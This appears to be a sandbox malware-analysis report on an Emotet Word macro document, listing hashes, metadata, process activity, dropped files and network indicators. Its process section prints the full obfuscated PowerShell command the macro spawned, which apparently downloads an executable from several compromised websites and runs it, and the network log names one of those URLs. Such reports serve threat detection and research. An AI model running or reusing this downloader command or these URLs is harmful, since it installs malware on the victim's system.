analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2019_05_391414_26.doc

Full analysis: https://app.any.run/tasks/a8dadcc3-1a09-4aa1-b2c5-12bbc487da3e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 13:53:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: platforms Home Loan Account, Subject: copying, Author: Zane Jenkins, Comments: neural-net, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 07:20:00 2019, Last Saved Time/Date: Mon May 20 07:20:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 63, Security: 0
MD5:

CC463AED17CCDE768F9CFC9C373942FE

SHA1:

1AC7F9C8C0BED5842C47E1269D49F19B4491E02E

SHA256:

EB1C76F474A6DDAF3430837B434E4A4B53CA9349C9EA280F2093E684D64B9BF3

SSDEEP:

3072:d77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qGaXX5ujEJM7YKTav59:d77HUUUUUUUUUUUUUUUUUUUT52VJaXX/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3308)
    • Executed via WMI

      • powershell.exe (PID: 3308)
    • PowerShell script executed

      • powershell.exe (PID: 3308)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 868)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 868)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: platforms Home Loan Account
Subject: copying
Author: Zane Jenkins
Keywords: -
Comments: neural-net
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 06:20:00
ModifyDate: 2019:05:20 06:20:00
Pages: 1
Words: 11
Characters: 63
Security: None
CodePage: Windows Latin 1 (Western European)
Company: West LLC
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 73
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Ruecker
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
868"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019_05_391414_26.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3308powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABSAF8ANwA4ADMAMgAwAD0AJwBJADgAMwA0ADQAMAAnADsAJABHADIAMQAyAF8AMQAzADgAIAA9ACAAJwA4ADgAMQAnADsAJABDADAAMAA3ADMANgA0AD0AJwB1ADQAXwA4ADQAOQBfACcAOwAkAEUANwAyAF8ANAA0ADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAMgAxADIAXwAxADMAOAArACcALgBlAHgAZQAnADsAJABZAF8AXwA5ADYANQAzADgAPQAnAHAAOAAzADIANwA5ADgANAAnADsAJABLADEAOAAyADgANgA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBlAFQALgBgAHcAZQBCAGMAbABgAEkAYABlAE4AVAA7ACQAQQA3AF8AMgAyAF8AMQAyAD0AJwBoAHQAdABwADoALwAvAHQAZQBuAGEAbgB0AHMAYwByAGUAZQBuAGkAbgBnAGEAcwBpAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAcABqAGQAdgB5ADEANwAvAEAAaAB0AHQAcAA6AC8ALwBiAHkAcwB0AGUAawBzAHQAaQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB6AG0ANgA0ADgAMQAvAEAAaAB0AHQAcAA6AC8ALwBlAHIAaQBjAC0AbQBhAG4AZABhAGwAYQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAagA2ADgANwAyADQAOAAxADIALwBAAGgAdAB0AHAAOgAvAC8AYQB2AGkAdAByAG8AbgBzAC4AYwBvAG0ALwB1AG0AYQAtAHMAaQB0AGUALwBpAHMAaQAyAC8AQABoAHQAdABwADoALwAvAGQAZQB2AGUAbABvAHAAaQBuAGcALgBzAG8AdQBsAGIAcgBpAGcAaAB0AHMALgBjAG8AbQAvAHcAcAAvAHMANAA0ADUALwAnAC4AUwBQAEwASQBUACgAJwBAACcAKQA7ACQAawAyADQAOAA3AF8AOAAzAD0AJwBYADUANgAyADUANgA2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABmADEANABfADAAMQBfADQAIABpAG4AIAAkAEEANwBfADIAMgBfADEAMgApAHsAdAByAHkAewAkAEsAMQA4ADIAOAA2AC4ARABvAFcAbgBMAE8AYQBEAGYASQBMAEUAKAAkAGYAMQA0AF8AMAAxAF8ANAAsACAAJABFADcAMgBfADQANAA1ACkAOwAkAFUANQA3ADUANQA5ADAAPQAnAFcAXwA4ADUANAAyACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARQA3ADIAXwA0ADQANQApAC4ATABlAG4AZwBUAEgAIAAtAGcAZQAgADMAOQA3ADMAMQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtACcAKwAnAEkAdABlAG0AJwApACAAJABFADcAMgBfADQANAA1ADsAJABPADMANgA5AF8AMwA4AD0AJwBKADEAOAAxADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAEYAOABfADAAOQA0AD0AJwBaADgAMQAyADUAMwAxAF8AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcgA3ADUANQA5ADAAPQAnAGYANQA1ADgAMwA1ADIAOQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 340
Read events
877
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
868WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3E35.tmp.cvr
MD5:
SHA256:
3308powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\94VRKK1RFMUEWI1JSVP6.temp
MD5:
SHA256:
3308powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134af7.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
868WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:4B58C77B2A18EBC747271C5A9DCE1860
SHA256:360AD4CDB9A749FB7A201A5ED0FBC60B7447F121CF8C0B18DD914ED57DC2FDEA
868WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:78854943818252C6E83A83506E030BA5
SHA256:70605DF163FEFE0262A4C8EC5FEA5164CDA9B34A06150B7FAA60DE41EEFE53B8
868WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$19_05_391414_26.docpgc
MD5:EBB88D0F649715838792BFC37DAE5429
SHA256:C57872F6661A5267AE43507895439047A990BF1C42695557696F95151CF121AC
868WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67A7EF5E.wmfwmf
MD5:A1759BDA71C3FE0B899A08B657C2643E
SHA256:13AD1498E24AE8D7E6FCE1B4FA1DD9855E865891B48CD56775EC3F351565A6C1
868WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F37C06D.wmfwmf
MD5:516BA6A9344381AB6F6DB577DB45BA8D
SHA256:416E6D195085C97C12590B9181BC7E9F119A2F18D0BFEE5CB1FEA7CE17E01B98
868WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D149BC7.wmfwmf
MD5:D74AEA0E6035706E931FFC1ACE7433A0
SHA256:6237DA1714E73CAE81D4F8C030187CC0733960E1945940A7539B38E7899F8D6A
3308powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3308
powershell.exe
GET
202.71.110.22:80
http://tenantscreeningasia.com/wp-admin/zpjdvy17/
MY
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3308
powershell.exe
202.71.110.22:80
tenantscreeningasia.com
TM-VADS DC Hosting
MY
suspicious

DNS requests

Domain
IP
Reputation
tenantscreeningasia.com
  • 202.71.110.22
suspicious

Threats

No threats detected
No debug info